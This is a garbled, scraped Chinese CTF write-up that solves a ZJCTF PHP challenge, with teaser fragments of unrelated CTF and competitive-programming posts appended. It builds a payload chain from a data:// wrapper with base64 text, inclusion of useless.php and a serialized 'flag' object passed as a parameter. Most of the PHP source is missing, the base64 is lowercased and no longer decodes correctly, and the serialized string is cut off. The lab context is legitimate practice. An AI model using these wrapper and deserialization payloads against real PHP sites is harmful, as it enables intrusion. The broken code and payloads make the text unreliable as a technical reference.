進入**
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf"))
用data偽協議傳參
?text=data://text/plain;base64,d2vsy29tzsb0byb0agugempjdgy=
原始碼分析
if(preg_match("/flag/",$file))else
} } ?>
執行下面**
<?php
class flag
} } $a = new flag();
echo serialize($a);
?>
得
o:4:"flag":1:
最終的payload為
?text=data://text/plain;base64,d2vsy29tzsb0byb0agugempjdgy=&file=useless.php&password=o:4:"flag":1:
整個路徑(結合題目)
進入
BUUCTF 刷題記錄(2020 11 11)
解密出來是 61666374667b317327745f73305f333435797d 然後提交flag,一直報錯,然後再看解密出來的字串。又因為7d在ascii上表示位 所以轉一下字串,答案為 afctf 所以提交flag為flag import gmpy2 n,p,q,e 920139713 ...
CTF web做題記錄 狼組 BUUCTF 一
1 ctf.wgpsec 你可能需要一部iphone 題目如下 考察點 user agent,burp改為iphone的user agent,發包得到flag 坑 理解錯誤,淦 考察點 理解,根據 本身繞過 highlight file source.txt echo flag xx msg giv...
OI刷題記錄
2014 4 18 poj3264 bzoj1699 balanced lineup rmq 2014 4 19 bzoj1012 jsoi2008 最大數maxnumber noi2004 鬱悶的出納員 bzoj3224 tyvj 1728 普通平衡樹 2014 4 20 bzoj1862 105...